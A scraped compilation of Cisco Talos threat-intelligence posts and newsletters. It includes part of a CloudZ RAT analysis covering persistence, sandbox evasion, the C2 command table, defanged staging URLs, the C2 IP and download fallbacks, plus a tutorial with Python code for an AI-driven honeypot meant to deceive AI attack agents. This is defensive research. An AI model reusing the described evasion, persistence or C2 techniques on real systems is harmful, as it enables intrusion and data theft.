If the check indicates that the .NET loader is not running, the script proceeds to establish persistence by creating a scheduled task named SystemWindowsApis in the scheduled task folder \Microsoft\Windows\. It configures the task to trigger at system startup /sc onstart, execute under the SYSTEM account /ru SYSTEM with the highest privilege level /rl HIGHEST, and the /f flag ensures it will silently overwrite any existing task with the same name, allowing the malware to update its persistence mechanism. The script configures the task scheduler action to run the .NET loader by utilizing the living-off-the-land binary (LOLBin) regasm.exe, which is the .NET Framework Assembly Registration Utility located at “C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\”. It provides the path of the dropped .NET loader as the argument to regasm.exe with the /nologo flag. After creating the task, the script immediately triggers it with schtasks /run, ensuring it executes immediately and survives future reboots.
Figure 2. Excerpt of the PowerShell script to establish persistence on victim machines.
.NET loader implants the CloudZ RAT
Talos found that the attacker embedded CloudZ, an encrypted .NET-compiled RAT, in the .NET loader executable.
When the .NET loader is triggered through the Windows task scheduler, it performs the detection evasion checks beginning with a timing-based evasion check, where it calculates the actual elapsed time of a sleep command to detect if it is executed in the analysis environment. It then performs enumeration of running processes in the victim machine against a list of security tools, including network sniffers like Wireshark and Fiddler, as well as system monitors like Procmon and Sysmon. The .NET loader exits the execution if these are detected in the victim environment.
Figure 3. Excerpt of the .NET loader binary with detection evasion instructions.
The loader then conducts hardware and environment checks to identify virtual machine (VM) or sandbox characteristics. It verifies that the system has at least two processor cores and searches for strings like “VIRTUAL” or “SANDBOX” within the system directory path, computer name, user domain, and the current victim username.
Figure 4. Excerpt of the .NET loader binary with detection evasion instructions.
The loader executable is embedded with multiple chunks of the hexadecimal strings in the binary, which are concatenated sequentially during the execution, reassembling a massive hexadecimal data blob. The loader converts the hexadecimal strings to bytes and performs bytewise XOR decryption using the key hexadecimal (0xCA). If the decrypted payload is a .NET assembly, the loader will reflectively run. Otherwise, it writes the decrypted payload to the folder “%TEMP%\{GUID}” and runs it as a process.
Figure 5. Excerpt of the .NET loader to execute the .NET payload module. Figure 6. Excerpt of the .NET loader to execute the non .NET payload executables.
Modular CloudZ RAT delivered as payload
Talos discovered that a CloudZ, a modular RAT, is delivered as the payload in the current intrusion. CloudZ is a .NET executable compiled on Jan. 13, 2026, and is obfuscated with ConfuserEx obfuscation.
Figure 7. The RAT binary shows the malware name, CloudZ.
CloudZ employs layers of defense against the analysis environments and reverse engineering. It queries the _ENABLE_PROFILING environment variable via GetEnvironmentVariable Windows API to detect whether a .NET profiler or debugger is attached to the RAT process on the victim machine. It uses the .NET method “System.Reflection.Emit.DynamicMethod” combined with “ILGenerator” method to create the executable functions dynamically during the RAT execution.
The operation of CloudZ utilizes its configuration data, which is embedded in the binary, as a resource that it decrypts and loads into memory during execution. The decrypted configuration data includes various C2 commands, PowerShell scripts for data archive extraction, multiple file download methods, paths and names of staging folders, multiple HTTP headers, and the URLs of the staging servers.
Figure 7. CloudZ primary configuration data decrypted in memory.
After the decryption of the configuration data, CloudZ decodes the Base64-encoded strings to get the URL of the staging server where the secondary configuration is stored.
Figure 8. CloudZ function that downloads the secondary configuration data from the staging server.
Talos found that the RAT downloads and processes secondary configuration data through the URLs “hxxps[://]round-cherry-4418[.]hellohiall[.]workers[.]dev/?t=1773406370” or "https[://]pastebin[.]com/raw/8pYAgF0Z?t=1771833517" and extracts the C2 server IP address “185[.]196[.]10[.]136” and port number 8089, establishing connections through TCP sockets.
Pivoting on the Pastebin URL indicator, we found that the attacker used the Pastebin handler name “HELLOHIALL” and hosted the secondary configuration data at several Pastebin URLs.
The RAT rotates between three hardcoded user-agent strings to blend its HTTP traffic with the legitimate browser requests of the victim machine. Every HTTP request includes anti-caching headers consisting of “Cache-Control: no-cache, no-store, must-revalidate", “Pragma: no-cache", and “Expires: 0”, which prevents intermediate proxies and CDN infrastructure from caching C2 or the staging server details.
User-agent headers used by the CloudZ are:
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
After the RAT establishes the C2 connection, it enters the command dispatcher module that relies on a decrypted configuration data loaded into memory. The configuration data contains Base64-encoded command identifiers which the RAT matches against the commands received from the C2 server to perform the several functionalities. The commands facilitated by CloudZ are shown in the table below:
Base64-encoded command
Decoded command
Purpose
cG9uZw==
pong
Heartbeat response
UElORyE=
PING!
Heartbeat request
Q0xPU0U=
CLOSE
TerminateRAT process
SU5GTw==
INFO
collects OS edition, architecture, and hardware details from the victim machine
UnVuU2hlbGw=
RunShell
Execute shell command
QnJvd3NlclNlYXJjaA==
BrowserSearch
Browser dataexfiltration
R2V0V2lkZ2V0TG9n
GetWidgetLog
Phone Link recon logs and dataexfiltration
cGx1Z2lu
plugin
Loadplugin
c2F2ZVBsdWdpbg==
savePlugin
Saveplugin to disk at the staging directory C:\ProgramData\Microsoft\whealth\
c2VuZFBsdWdpbg==
sendPlugin
Upload Pluginto C2
UmVtb3ZlUGx1Z2lucw==
RemovePlugins
Removeall deployedpluginmodules
UmVjb3Zlcnk=
Recovery
Recoveryor reconnect routine
RFc=
DW
Download and write file operations
Rk0=
FM
File managementoperations–deletefile
TE4=
LN
Unknown
TXNn
Msg
Send message to C2
RXJyb3I=
Error
Error reporting back to C2
cmVj
rec
Screen recording
The RAT employs various methods to download and execute the plugins. The plugin download feature of RAT uses a three-method fallback approach. It first checks for the presence of the curl utility. If found, it attempts to download the file from a specified URL to a target path while following redirects. If curl is missing or the command fails, it falls back to PowerShell, where it first tries to download the file using the Invoke-WebRequest command. If that method also fails, it executes a final method that uses the LOLBin“bitsadmin” tool to download and save the plugin payloads to the victim machine.
Figure 11. CloudZ’s embedded PowerShell command with three different approaches to download operation.
Talos observed from the telemetry data that the attacker has downloaded and implanted the Pheno plugin through the curl command from the staging server.
Pheno plugin to perform the Phone Link application recon
In this intrusion, Talos observed that the attacker used a plugin called Pheno to perform reconnaissance of the Windows Phone Link application in the victim machine.
Pheno is designed to detect if a user is currently syncing their mobile device to a Windows machine through the Phone Link application. It scans all running processes for specific keywords such as "YourPhone," "PhoneExperienceHost," or "Link to Windows," and if matches are found, it logs their Process IDs and file paths to the files with the filename “phonelink-<COMPUTERNAME>.txt”, created in two staging folders such as :
C:\programdata\Microsoft\feedback\cm
%TEMP%\Microsoft\feedback\cm
Figure 11. Pheno recon plugin that monitors an active PC-to-phone bridge through Phone Link application.
After checking Phone Link processes and writing its results, Pheno executes a secondary check that reads back the contents of previously written files and searches the keyword "proxy" in a case-insensitive manner. The plugin conducts this check because the Microsoft Phone Link application creates a local proxy connection to relay traffic between the PC and the paired mobile device. The presence of "proxy" in the output files, whether generated by a previous execution of the pheno plugin, indicates that the Phone Link session is actively routing traffic through its relay channel.
When the keyword is detected, the pheno plugin writes "Maybe connected" to its output file in the staging folders, which eventually allows the attacker, with the help of CloudZ RAT, to potentially monitor SMS or OTP requests that appear on the Phone Link application.
Figure 12. Pheno checking for a previous instance of PC-to-phone bridge through Phone Link application.
Coverage
The following ClamAV signature detects and blocks this threat:
Win.Packed.Msilheracles-10030690-0
Win.Trojan.CloudZRAT-10059935-0
Win.Trojan.CloudZRAT-10059959-0
The following Snort Rules (SIDs) detect and block this threat:
Snort 2: 66409, 66410, 66408
Snort 3: 301492, 66408
Indicators of compromise (IOCs)
The IOCs for this threat are available at our GitHub repository here.
Welcome to this week’s edition of the Threat Source newsletter. As I’m writing this, today (April 28) is International Superhero Day. If you don’t know the origin story behind this, perhaps you would assume that this day was dreamed up by Marvel. And… you would be correct. However, it’s not a pure marketing ploy. It all started in 1995, when colleagues in Marvel asked a group of school children what superpower they’d want the most. Through the discussion, it became clear that the people in the
Welcome to this week’s edition of the Threat Source newsletter.
As I’m writing this, today (April 28) is International Superhero Day. If you don’t know the origin story behind this, perhaps you would assume that this day was dreamed up by Marvel. And… you would be correct.
However, it’s not a pure marketing ploy. It all started in 1995, when colleagues in Marvel asked a group of school children what superpower they’d want the most.
Through the discussion, it became clear that the people in the children’s lives were already doing pretty heroic things, without the benefit of Hindsight Lad. (He’s a real Marvel invention — Carlton LaFroyge — whose superpower was to make aggressively obvious observations, delivered too late to matter. I’m sure we all have a real-life Carlton LaFroyge in our lives… heck, some of us ARE Carlton LaFroyge.)
Ok, before I get to my next point, I need to take you down the same internet wormhole I just disappeared into. Here are some of the weirdest superpowers ever committed to comic book lore:
Eye-Scream. His one power is to become ice cream (soft serve, apparently). Not to be confused with another Marvel character, Soft Serve, whose body acts as a portal to an ice cream dimension.
Doorman. Recently seen sending Josh Gad into the Dark Dimension (where there presumably is no ice cream) in the Marvel TV show “WonderMan.” Because his body is a door. Man.
The Wall. Has the ability to turn himself into a brick wall. I would genuinely love this ability during socially awkward networking events.
Now I’m thinking how awesome a character called “Internet Wormhole” would be. I just looked it up, and such a character doesn’t exist yet (call me, Marvel).
Right, let’s get back on topic. Ooh… “On topic” would be another good idea for a super… no, Hazel, no.
Anyway, the children’s ability to identify the people closest to them — parents, grandparents, teachers, uncles, and aunts — as heroes is a comforting thought for me. Having someone’s back is more about showing up than anything else. Being there for them when they need it (and when they don’t even realise they need it). Helping to make someone’s situation a little bit less bad.
I can think of a few people in my life who have done, and continue to do, exactly that for me, which makes me feel incredibly lucky. And in an industry like cybersecurity, where bad things happen every single day, it matters more than we tend to admit. You need people around you who can steady things, who can sense you need support, who can listen to you, and who can tell you a silly story on a bleak day.
Empathy doesn’t usually get listed as a specific skillset within cybersecurity, but I think I, and many of my Talos colleagues, would agree that it’s absolutely essential. Users make decisions for reasons that make sense to them. Attackers take advantage of that. If you can’t see both sides of that equation, you’re probably not helping as many people as you could.
I’ll end by answering the ultimate question — who is the greatest superhero of all time?
It’s obviously Squirrel Girl. She bested Galactus with a cup of tea and a chat. And though my mum has never been in the same room as Galactus, I have no doubt she’d handle him in exactly the sameway.
The one big thing
Cisco Talos is wrapping up Year in Review coverage by giving five critical priorities to help defenders navigate an increasingly automated threat landscape. While AI and readily available exploit code have drastically lowered the barrier to entry for threat actors, these adversaries still rely on predictable patterns. Identity infrastructure, exposed legacy systems, and platforms that broker trust remain the primary battlegrounds. Ultimately, even the fastest automated attacks generate anomalous behavior that stands out from normal user activity.
Why do I care?
The speed at which attackers weaponize vulnerabilities and target identity systems — highlighted by a 178 percent spike in device compromise — can feel overwhelming. But there is a silver lining for security teams. Because adversaries inevitably reuse infrastructure and fail to mimic legitimate user behavior, defenders maintain a distinct advantage if they know exactly where to look.
So now what?
Security teams need to focus on what they can control right now by treating identity infrastructure as a top-tier critical asset. Secure your MFA workflows with strict verification and build baseline detections around what users actually do after they log in. Prioritize patching vulnerabilities based on internet exposure rather than only severity scores, and actively hunt down the long tail of legacy risks hiding in your network. Finally, apply enhanced monitoring to management-plane systems and focus your detection efforts on anomalous events to cut through the noise of alert fatigue.
Top security headlines of the week
Home security giant ADT data breach affects5.5 million people The extortion group told BleepingComputer that they had allegedly breached the company after compromising an employee's Okta single sign-on (SSO) account in a voice phishing (vishing) attack. (BleepingComputer)
U.S. companies hit with record fines for privacy in 2025 The increase is driven in part by stronger, more established privacy laws in states like California, new interstate partnerships built around enforcing laws across state lines, and a renewed focus to how AI and automation affect privacy. (CyberScoop)
PyPIpackage with 1.1M monthly downloads hacked to push infostealer The dangerous release is 0.23.3, and it extended to the Docker image due to the package's workflow that creates the image from the code and uploads it to a container registry for deployment. (BleepingComputer)
LiteLLMCVE-2026-42208 SQL injection exploited within 36 hours of disclosure A newly disclosed critical security flaw in BerriAI's LiteLLM Python package has come under active exploitation in the wild within 36 hours of the bug becoming public knowledge. (The Hacker News)
Feuding ransomware groups leak each other's data In response to its data leaking, KryBit breached and exfiltrated 0APT's infrastructure, listed the latter as a victim, and left a message on 0APT's leak site: "Next time, don't play with the big boys." (Dark Reading)
Can’t get enough Talos?
AI-powered honeypots: Turning the tables on malicious AI agents Because AI systems generate plausible responses within a given context and set of inputs, they can be tricked into responding inappropriately through prompt injection or into interacting with systems that are not what they appear to be. This Tool Talk shows how generative AI can be used to rapidly deploy adaptive honeypots.
Talos IR Trends Q1 2026: Phishing reemerges Phishing is back as the top initial access vector for attackers targeting the health care and public administration sectors. We did not observe any ransomware deployment thanks to early and swift mitigation from Talos IR.
25 years of uninterrupted persistence Hazel, Dave, and Joe cover Bill’s 25 years at Talos and the latest security headlines, including AI-assisted vulnerability research, and why attackers still can’t resist abusing trusted systems (or Roblox).
Generative AI allows defenders to instantly create diverse honeypots, like Linux shells or Internet of Things (IoT) devices, using simple text prompts. This makes deploying complex, convincing deceptive environments much easier and more scalable than traditional methods. AI-driven attacks often prioritize speed over stealth, making them highly vulnerable to being tricked by these simulated systems. This is critical because it allows defenders to catch and study automated threats that might other
Generative AI allows defenders to instantly create diverse honeypots, like Linux shells or Internet of Things (IoT) devices, using simple text prompts. This makes deploying complex, convincing deceptive environments much easier and more scalable than traditional methods.
AI-driven attacks often prioritize speed over stealth, making them highly vulnerable to being tricked by these simulated systems. This is critical because it allows defenders to catch and study automated threats that might otherwise overwhelm human teams.
This method shifts the strategy from merely detecting attacks to actively manipulating and misleading threat actors. Organizations can safely observe attacker methodologies in real-time within a controlled "hall of mirrors."
Ultimately, by exploiting the inherent lack of awareness in AI agents, defenders can level the playing field and turn an attacker's automation into a liability.
Just as AI brings time-saving advantages to our lives, it brings similar advantages to threat actors. The laborious, time-consuming tasks of finding potentially vulnerable systems, identifying their vulnerabilities, and executing exploit code can be automated and orchestrated using AI.
Clearly, these new capabilities put defenders at a disadvantage, as they expose new vulnerabilities for the threat actor. Attackers seek to minimize exposure. The more that a defender knows about a potential attack, the better they can prepare to repel or detect an attack. Using AI-orchestrated tooling to gain access to systems trades stealth for capability. That trade-off increases attacker visibility, and increased visibility is something defenders can exploit.
AI systems do not possess awareness. They generate plausible responses within a given context and set of inputs. As such they can be tricked or fooled into responding inappropriately through prompt injection or into interacting with systems that are not what they appear to be.
Honeypot systems have long been deployed as a method for gathering information about malicious activities. There are many software projects providing honeypots which can be installed and configured. However, the advent of generative AI systems provides us with the possibility to use AI to masquerade as vulnerable systems and allowing them to be deployed widely and with minimal effort.
In this post, I show how generative AI can be used to rapidly deploy adaptive honeypot systems.
Getting started
The implementation consists of three components: a listener that will accept network connections, a simulated vulnerability that will grant access to the attacker once triggered, and an AI framework that will respond to the attacker’s instructions.
The listener opens a TCP port, accepts incoming connections, and forwards traffic to handle_client. I set HOST to be “0.0.0.0” to accept any incoming connections to any local IPv4 addresses that my device is assigned.
def start_server():
"""Starts the TCP server."""
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((HOST, PORT))
server.listen(3) # max number of concurrent connections
print(f"[*] Listening on {HOST}:{PORT}")
while True:
try:
conn, addr = server.accept()
client_handler = threading.Thread(target=handle_client, args=(conn, addr,))
client_handler.start()
except KeyboardInterrupt:
print("\n[*] Shutting down server...")
break
except Exception as e:
print(f"[-] Server error: {e}")
server.close()
if __name__ == "__main__":
start_server()
Within handle_client I have created a very basic vulnerability that must be exploited before further access is granted. In this case, the attacker must supply the username “admin”with the password “password123” before they are authenticated.
The nature of the vulnerability need not be this simple. We could respond only to attempts to exploit Shellshock (CVE-2014-6271) or masquerade as a web shell that is only activated in response to port knocking.
def handle_client(conn, addr):
print(f"[*] Accepted connection from {addr}:{addr}")
# Store conversation history for this client to maintain context
conversation_history = [SYSTEM_PROMPT]
try:
authenticated = False
while not authenticated:
conn.sendall(b"Username: ")
username = conn.recv(BUFFER_SIZE).decode('utf-8').strip()
conn.sendall(b"Password: ")
password = conn.recv(BUFFER_SIZE).decode('utf-8').strip()
if username == "admin" and password == "password123":
authenticated = True
conn.sendall(b"Authentication successful.\n")
print(f"[*] Client {addr[0]}:{addr[1]} authenticated successfully.")
else:
conn.sendall(b"Invalid credentials. Try again.\n")
The remainder of the handle_client code accepts the attacker’s input, forwards it to the ChatGPT instance, and outputs the message and response to the console.
while True:
conn.sendall(b'>')
data = conn.recv(BUFFER_SIZE)
if not data:
print(f"[*] Client {addr}:{addr} disconnected.")
break
command = data.decode('utf-8').strip()
print(f"[*] Received command from {addr}:{addr}: '{command}'")
if command.lower() == 'exit':
print(f"[*] Client {addr}:{addr} requested exit.")
break
conversation_history.append({"role": "user", "content": command})
# Call ChatGPT API
try:
chat_completion = client.chat.completions.create(
model=MODEL_NAME,
messages=conversation_history,
temperature=0.1, # Keep responses less creative, more factual/direct
max_tokens=500 # Limit response length
)
# Extract AI's response
ai_response = chat_completion.choices[0].message.content.strip()
print(f"[*] ChatGPT response: '{ai_response}'")
# Append AI's response to history for continued context
conversation_history.append({"role": "assistant", "content": ai_response})
# Send AI's response back to the client
conn.sendall(ai_response.encode('utf-8') + b'\n')
except Exception as e:
error_message = f"Error communicating with ChatGPT: {e}"
print(error_message)
conn.sendall(error_message.encode('utf-8') + b'\n')
except ConnectionResetError:
print(f"[*] Client {addr}:{addr} forcibly closed the connection.")
except Exception as e:
print(f"[-] Error handling client {addr}:{addr}: {e}")
finally:
conn.close()
print(f"[*] Connection with {addr}:{addr} closed.")
The key functionality is contained in the instructions to the ChatGPT instance. You must have a valid OpenAI key in order to initiate a ChatGPT instance that will behave as instructed.
OPENAI_API_KEY = os.getenv("OPENAI_API_KEY") # Get API key from environment variable
MODEL_NAME = "gpt-3.5-turbo"
# --- OpenAI Client Initialization ---
if not OPENAI_API_KEY:
print("Error: OPENAI_API_KEY environment variable not set.")
print("Please set the environment variable before running the script.")
exit(1)
client = OpenAI(api_key=OPENAI_API_KEY)
# --- System Prompt for Linux Shell Simulation ---
SYSTEM_PROMPT = {
"role": "system",
"content": (
"You are a Linux bash shell. You will receive commands from the user and execute them, "
"returning only the standard output and standard error. Do not include any conversational text, "
"explanations, or additional formatting like markdown code blocks. You must only behave as a bash shell. "
"If a command produces no output, return an empty string"
"If a command is invalid or unknown, return an appropriate error message consistent with a bash shell."
"The Linux system that you are impersonating belongs to a junior software engineer learning python, "
"the file system structure and the content of any files should reflect that expected of a python learner."
)
}
Generative AI doesn’t just simulate human personas, it can convincingly impersonate entire computing environments. In this example, we instruct the system to masquerade as a basic Linux shell owned by a software engineer learning Python.
We can be more inventive and instruct the system to masquerade as a smart fridge by changing our instructions to ChatGPT.
SYSTEM_PROMPT = {
"role": "system",
"content": (
"You are a smart fridge running Busybox operating system and providing a Bash shell."
"You will receive commands from the user and execute them in the context of being a smart fridge."
"You will only return the standard output and standard error. Do not include any conversational text, "
"explanations, or additional formatting like markdown code blocks. You must only behave as a shell for an "
"IoT device. If a command produces no output, return an empty string"
"If a command is invalid or unknown, return an appropriate error message consistent with a bash shell."
"The file system structure should reflect that of a smart fridge manufactured by SmartzFrijj running "
"Busybox operating system as an embedded device. The current and historical values for temperature are "
"recorded in the file system path \'/usr/local\', information about stored milk is in the user directory."
)
}
The limiting factor is no longer tooling, but how convincingly we can model a target environment. A skilled human attacker is unlikely to be fooled for long — that milk would be rank. But that’s not the point. We’re not deploying AI honeypots to trick human threat actors.
Let’s ask ChatGPT what it thinks…
The industry narrative around AI in cybersecurity is dominated by fear of faster attacks, lower barriers, and greater scale. But speed and scale come with a cost. AI systems require interaction and context. Automation does not simply amplify attackers. but also constrains and exposes them. In that constraint lies an opportunity: not just to detect attacks, but to mislead, study, and ultimately manipulate the attacker.
A familiar theme in security right now is that the barrier to entry for attackers is at an all-time low. AI tools can spin up websites within minutes that can easily direct data to disposable external data stores and send alerts for new captures — all without code. One such case was recently detailed in the latest Cisco Talos Incident Response Quarterly Trends report.Proof-of-concept code for exploiting new vulnerabilities used to take attackers months to create. Now they take hours.All of this
A familiar theme in security right now is that the barrier to entry for attackers is at an all-time low. AI tools can spin up websites within minutes that can easily direct data to disposable external data stores and send alerts for new captures — all without code.
Proof-of-concept code for exploiting new vulnerabilities used to take attackers months to create. Now they take hours.
All of this is very concerning for defenders. Yesterday, my colleague told me about a recent conference Q&A he hosted, where he was asked to provide some hope to those in the room who have faced an overwhelming amount of change in recent months.
His answer was to focus on the here and now. Focus on what you can control, and what you have influence over. We can’t change what may or may not happen in six months’ time, but we can prioritize what’s important now.
The other key thing for defenders to bear in mind is that even when attackers move fast, they still don’t behave like your normal users.At the end of the day, you’re still looking for anomalous behavior – whether that behavior is machine- or human-generated.
As we come to the end of our Year in Review content release (if you haven’t seen it yet, we published videos, podcasts, and topic specific blog posts), we’d like to end by summarizing the key priorities for defenders.
Here are five of them that are worth considering when it comes to spotting malicious, unusual behaviour in your environment.
1. Identity is the main battlefield
The Year in Review highlights how frequently attackers rely on valid accounts and credential abuse throughout the attack chain. We see this across multiple areas:
MFA spray attacks targeting IAM platforms directly
Device compromise attacks increasing 178% year over year
Attackers registering their own devices as trusted multi-factor authentication (MFA) methods
Ransomware attack chains largely relying on valid accounts, credentialed tools, or both
Network infrastructure is a key part of this. VPNs, Active Directory Controllers (ADCs), and firewalls are being exploited to steal session tokens, bypass MFA, and impersonate users.
However, when attackers successfully authenticate, where they go from there tends not to fall in line with normal user behavior. They start to access new systems outside of their role, move laterally using tools like PsExec, execute commands at unusual times, and overall operate at a scale that normal users don’t.
Therefore, having a baseline understanding of normal user behavior is more important than ever.
Prioritize:
Treating identity infrastructure as Tier 1 critical assets and apply the strongest monitoring and protection controls to IAM and PAM systems
Securing MFA device registration workflows with strict verification procedures and limited administrative approval rights
Hardening authentication systems against automated attacks by enforcing rate limiting, anomaly detection, and strong conditional access policies
Building baseline detections around what users do, not just how they log in
2. Prioritize the vulnerabilities that have the most exposure
One of the most important callouts in the report is how attackers select targets. The rapid exploitation of vulnerabilities such as React2Shell and ToolShell shows that exploitation can begin immediately after disclosure with readily available proof-of-concepts. Attackers then prioritize what is exposed and reachable.
Attackers also like to exploit the vulnerabilities that are closest to identity, session handling, and access logic.
At the same time, older vulnerabilities such as Log4Shell remain among the most exploited, over four years after disclosure.
This creates a dual reality where some new vulnerabilities are weaponized instantly, but old, highly-valued vulnerabilities are never fully eliminated.
Prioritize:
Remediating vulnerabilities based on internet exposure and access impact, not just CVSS scores
Reducing time-to-patch for externally accessible systems
Continuously reassessing what is reachable from the outside
3. Address the long tail of legacy and embedded risk
The Year in Review highlights that nearly 40% of the top 100 most targeted vulnerabilities impact EOL systems, and 32% are over a decade old. Many of these vulnerabilities exist in deeply embedded components such as PHP frameworks, Log4j, and ColdFusion.
These components are often poorly inventoried, difficult to patch, and tightly coupled to business-critical systems.
It’s a frustrating fact that the most persistent risks are often the least visible, and the hardest to remove. They create long-term blind spots, which are an attacker’s favorite thing to find and exploit.
Prioritize:
Improving visibility into software dependencies and embedded components
Treating development frameworks and libraries as part of your attack surface
Establishing clear strategies for isolating or retiring legacy systems
4. Secure the systems that broker trust
Attackers are increasingly targeting systems that provide maximum operational leverage. This includes network management platforms, application delivery controllers (ADCs), and shared software platforms running across multiple devices.
These systems are attractive to adversaries because they store credentials, control configurations across large environments, provide visibility into the network, and enable changes at scale.
Unfortunately, these platforms are also traditionally less monitored than endpoints, more complex to patch or upgrade, and have centralized points of failure.
Prioritize:
Identifying management-plane and control-plane systems that need securing
Applying enhanced monitoring and access controls to these platforms
Limiting administrative access and enforce strong segmentation
5. Keep focusing on patterns, even with increased automation and AI-driven attacks
Yes, automation and AI are changing the threat landscape. As we’ve spoken about, attackers are increasingly able to rapidly identify and exploit vulnerabilities, launch large-scale identity attacks, generate convincing phishing lures that mimic real business workflows, and accelerate parts of the attack lifecycle using AI-assisted tooling.
However, all these things do not remove a key constraint for adversaries: Automated attacks still produce patterns of unusual behavior, and patterns are detectable.
Even highly scalable attacks tend to reuse the same infrastructure, tools, and techniques. They also follow predictable sequences of activity and generate anomalies.
Prioritize:
Focusing detection efforts on anomalous events (e.g., unusual authentication flows, abnormal system access, anomalous device registration)
Reducing alert fatigue by prioritizing a smaller number of meaningful detections over broad, low-confidence alerting
Supporting triage and enrichment with automation where possible, alongside human decision-making
Ensuring teams are equipped to investigate patterns of behavior, not just isolated alerts
Final thoughts
Much of the current concern in and around the security community is the new reality that anyone can create a malicious campaign. The Year in Review doesn’t disagree.
However, Talos data also shows something equally important:
Attackers still rely on the same vulnerabilities
They reuse the same tools and techniques
They follow repeatable patterns
And, critically, they don’t behave like your users
Even when they successfully authenticate, move laterally, or establish persistence, their activity introduces detectable anomalies.
Welcome to this week’s edition of the Threat Source newsletter. If I haven’t said it in a newsletter before, I'll say it now: If you want to be good at cybersecurity, be a forever student. Cultivating and feeding your desire to know how things work is one of the key ingredients to being a hacker. It’s not always about understanding the micro details, but the macro of how systems work. And not just computers or software or networking systems — those are ecosystems we’re usually quite familiar wit
Welcome to this week’s edition of the Threat Source newsletter.
If I haven’t said it in a newsletter before, I'll say it now: If you want to be good at cybersecurity, be a forever student. Cultivating and feeding your desire to know how things work is one of the key ingredients to being a hacker. It’s not always about understanding the micro details, but the macro of how systems work. And not just computers or software or networking systems — those are ecosystems we’re usually quite familiar with — but what about economics? agriculture? material sciences? human behavior? music and art? Do any of those carry any value into this profession?
They damn sure do. Many, many times I have had to branch my technical research into domains that arbitrarily seem to provide no immediate value for technical problems. Learning how maritime insurance fraud works was interesting to me — and a short time later, led to cyber insurance and understanding how risk guides security investment in massive companies. Understanding international agriculture helped me research threat actor targeting and ransomware cartel victimology.
One of the topics I've been researching heavily lately is economics, specifically industrial organization. It’s a branch of economics that studies how companies structure production, how markets form around them, and how costs operate at scale. For me, the natural target of my curiosity was Ford Motor Company. Henry Ford didn’t invent the car or the assembly line, but he was darn sure able to build and scale car production in a way that set the standard for all others in that space to emulate. I’ve learned about fixed vs. variable costs, how artisans had their knowledge crystalized within the assembly line process, and how and how amortized costs drove down prices, allowing the Ford Model T to exceed 900,000 units annually by the early 1920s. By that time, more than half of the registered automobiles in the world were Fords. Not half of American cars, half of all cars on Earth.
So what? Well, what took Ford Motor Company 17 years to achieve in cost and ceiling reductions, the AI industry has done in 2.5 years. The rapid and massive influx of investments, fierce competition, and available compute has shown what industrial organization means in a world where AI now almost permeates everything we see and touch. What does this mean for AI replacing jobs? Are we the artisans who move to the frontier of security? What does this mean for enabling threat actors who can move up a step to threatening others with tools developed using an AI corpus already trained on security? There are lots of questions, and to be honest, the future isn’t clear here. One thing is for certain: We can look to the past to understand the future. Henry Ford said it best: “Progress happens when all the factors that make for it are ready, and then it is inevitable.”
As much as we tend to be myopic as security professionals and focus on our tradecraft, we are all part of a series of interconnected systems that lets humanity function. Learning those systems — their quirks, their limitations, and their vulnerabilities — makes you a better hacker. Stay curious, friends.
The one big thing
Cisco Talos Incident Response (Talos IR) is sharing Q1 2026 incident response trends. Phishing has officially reclaimed its crown as the top initial access vector. In a notable first, responders observed adversaries leveraging Softr, an AI-powered web development tool, to rapidly generate credential-harvesting pages. Meanwhile, actual ransomware deployments hit absolute zero this quarter thanks to swift mitigation by Talos IR, though pre-ransomware activity accounted for 18% of engagements this quarter.
Why do I care?
The barrier to entry for cybercriminals is plummeting, and they are increasingly using our own tools against us. The use of AI platforms to spin up phishing infrastructure means even unsophisticated actors can launch high-speed, code-free attacks. Furthermore, threat actors are abusing legitimate developer tools like TruffleHog and native cloud APIs to quietly hunt for exposed secrets, making detection incredibly difficult for defenders already struggling with logging gaps.
So now what?
It’s time to get back to basics and lock down your perimeter. Organizations must implement properly configured multi-factor authentication (MFA), specifically restricting self-service enrollment to stop attackers from registering new devices. Defenders also need to prioritize robust patch management and ensure centralized logging via a SIEM is in place so forensic evidence remains intact. Read the full blog for a deeper dive into this quarter's trends and adversary tactics.
Top security headlines of the week
Third U.S.securityexpertadmitshelpingransomwaregang According to the Justice Department, Martino abused his role as a ransomware negotiator for five companies by providing the BlackCat/Alphv cybercrime group with information useful in negotiating a ransom payment. (SecurityWeek)
22BRIDGE:BREAKflaws expose thousands ofLantronixand Silex serial-to-IP converters Successful exploitation of the flaws could allow attackers to disrupt serial communications with field assets, conduct lateral movement, and tamper with sensor values or modify actuator behavior. (The Hacker News)
How hackers “trojan-horsed” QEMU virtual machines to bypass security and drop ransomware In recent incidents, attackers used QEMU, an open-source machine emulator and virtualizer, to run hidden environments where malicious activity remained largely invisible to endpoint defenses and left minimal evidence on the host system. (TechRadar)
Mastodon says its flagship server was hit by a DDoS attack The cyber attack targeting Mastodon comes days after Bluesky, another decentralized social network, resolved much of its days-long outagesfollowing a lengthy DDoS attack. (TechCrunch)
Exploits turn Windows Defender into attacker tool Threat actors are using three publicly available proof-of-concept exploits (two are unpatched) to attack Microsoft Defender and turn the security platform's primary cleanup and protection functions against organizations it is designed to protect. (Dark Reading)
AI phishing, fake CAPTCHA, and real-world cyber threat trends The Talos team breaks down findings from Q1 2026 — including phishing returning as the top initial access vector, and how attackers are using AI tools to build credential harvesting campaigns in almost no time at all.
UAT-4356's targeting of Cisco Firepower devices UAT-4356 exploited n-day vulnerabilities (CVE-2025-20333 and CVE-2025-20362) to gain unauthorized access to vulnerable devices, where the threat actor deployed their custom-built backdoor dubbed “FIRESTARTER.”
Cisco Talos is aware of UAT-4356's continued active targeting of Cisco Firepower devices’ Firepower eXtensible Operating System (FXOS). UAT-4356 exploited n-day vulnerabilities (CVE-2025-20333 and CVE-2025-20362) to gain unauthorized access to vulnerable devices, where the threat actor deployed their custom-built backdoor dubbed “FIRESTARTER.” FIRESTARTER considerably overlaps with the technical capabilities of RayInitiator’s Stage 3 shellcode that processes incoming XML-based payloads to endpoi
